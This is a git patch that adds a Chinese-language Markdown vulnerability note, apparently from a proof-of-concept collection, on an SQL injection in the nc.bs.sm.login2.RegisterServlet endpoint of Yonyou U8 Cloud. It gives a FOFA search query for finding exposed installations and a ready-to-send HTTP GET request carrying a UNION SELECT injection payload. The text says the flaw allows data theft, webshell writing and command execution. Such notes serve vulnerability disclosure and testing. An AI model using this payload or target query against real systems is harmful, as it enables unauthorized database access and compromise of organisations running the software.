From 709b8cfa6dffab02f87cd6ab7234559b4364ef8c Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Thu, 28 Mar 2024 19:30:10 +0800 Subject: [PATCH] =?UTF-8?q?Create=20=E7=94=A8=E5=8F=8BU8-nc.bs.sm.login2.R?= =?UTF-8?q?egisterServlet=E5=AD=98=E5=9C=A8SQL=E6=B3=A8=E5=85=A5=E6=BC=8F?= =?UTF-8?q?=E6=B4=9E.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...bs.sm.login2.RegisterServlet存在SQL注入漏洞.md | 17 +++++++++++++++++ 1 file changed, 17 insertions(+) create mode 100644 用友U8-nc.bs.sm.login2.RegisterServlet存在SQL注入漏洞.md diff --git a/用友U8-nc.bs.sm.login2.RegisterServlet存在SQL注入漏洞.md b/用友U8-nc.bs.sm.login2.RegisterServlet存在SQL注入漏洞.md new file mode 100644 index 0000000..e412063 --- /dev/null +++ b/用友U8-nc.bs.sm.login2.RegisterServlet存在SQL注入漏洞.md @@ -0,0 +1,17 @@ +## 用友U8-nc.bs.sm.login2.RegisterServlet存在SQL注入漏洞 + +用友U8 Cloud nc.bs.sm.login2.RegisterServlet接口存在SQL注入,黑客可以利用该漏洞执行任意SQL语句,如查询数据、下载数据、写入webshell、执行系统命令以及绕过登录限制等。 + +资产测绘 +## fofa +``` +app="用友-U8-Cloud" +``` + +## poc +``` +GET /servlet/~uap/nc.bs.sm.login2.RegisterServlet?usercode=1%27%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,@@version,NULL,NULL,NULL,NULL--%20Jptd HTTP/1.1 +Host: +X-Forwarded-For: 127.0.0.1 +Cookie: JSESSIONID=D523370AE42E1D2363160250C914E62A.server +```